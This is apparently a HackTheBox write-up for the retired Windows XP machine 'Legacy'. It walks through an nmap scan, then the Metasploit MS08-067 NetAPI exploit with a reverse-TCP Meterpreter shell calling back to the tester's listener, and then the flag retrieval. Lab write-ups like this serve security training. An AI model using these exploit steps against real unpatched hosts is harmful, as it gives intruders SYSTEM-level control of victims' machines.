Home Writeups Legacy
Legacy HTB

HTB - Legacy Write-Up

Easy Windows Windows Security HackTheBox
ctf boot2root smb windows metasploit MS08-067
01 /

Introduction

Legacy is a retired machine on HackTheBox. The objective is to compromise the target and retrieve both the user and root flags.

Name Legacy
Difficulty Easy
OS Windows
Type Windows Security

Let's dive into the challenge!

02 /

Reconnaissance

I started by adding the machine IP to /etc/hosts:

hosts setup 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ sudo vim /etc/hosts

Then I ran a full NMAP scan to enumerate open ports and services:

nmap scan results 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ sudo nmap -sV -sC -p- -Pn legacy.htb
Starting Nmap 7.94SVN at 2024-06-15 20:21 CEST
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: LEGACY
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|_  System time: 2024-06-20T23:19:41+03:00

Nmap done: 1 IP address (1 host up) scanned in 38.88 seconds

Only SMB ports are open (135, 139, 445) and the OS is Windows XP - a heavily outdated system with well-known critical vulnerabilities.

A quick search for Windows XP SMB exploits leads to the infamous MS08-067 vulnerability. I found the relevant Metasploit module here: rapid7.com - ms08_067_netapi

MS08-067 - Windows XP SMB Remote Code Execution (NetAPI)
03 /

Getting a Shell

I loaded the exploit in Metasploit, configured the target and listener, then fired it:

metasploit - MS08-067 
┌─[dawnl3ss@parrot]─[~/Neptune/Security/CTF/HTB/Legacy]
└──╼ [★]$ msfconsole

       =[ metasploit v6.3.44-dev ]
+ -- --=[ 2376 exploits - 1232 auxiliary - 416 post ]

[msf] use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

set RHOSTS legacy.htb
RHOSTS => legacy.htb

set LHOST tun0
LHOST => 10.10.14.5

exploit
[-] Handler failed to bind to 10.10.14.5:4444 - address already in use.
# Port 4444 was already in use, running exploit again after freeing it:

exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1035)

(Meterpreter 1)(C:\WINDOWS\system32) >

Meterpreter session opened! Since the exploit runs as SYSTEM, there is no privilege escalation needed - we have full control of the machine from the start.

Both user and root flags are located under C:\Documents and Settings\:

flags 
(Meterpreter 1)(C:\WINDOWS\system32) > cd "C:\Documents and Settings"
(Meterpreter 1)(C:\Documents and Settings) > search -f user.txt
Found: C:\Documents and Settings\john\Desktop\user.txt
(Meterpreter 1)(C:\Documents and Settings) > search -f root.txt
Found: C:\Documents and Settings\Administrator\Desktop\root.txt

Both flags captured! Box fully pwned via MS08-067 NetAPI SMB exploit. 💀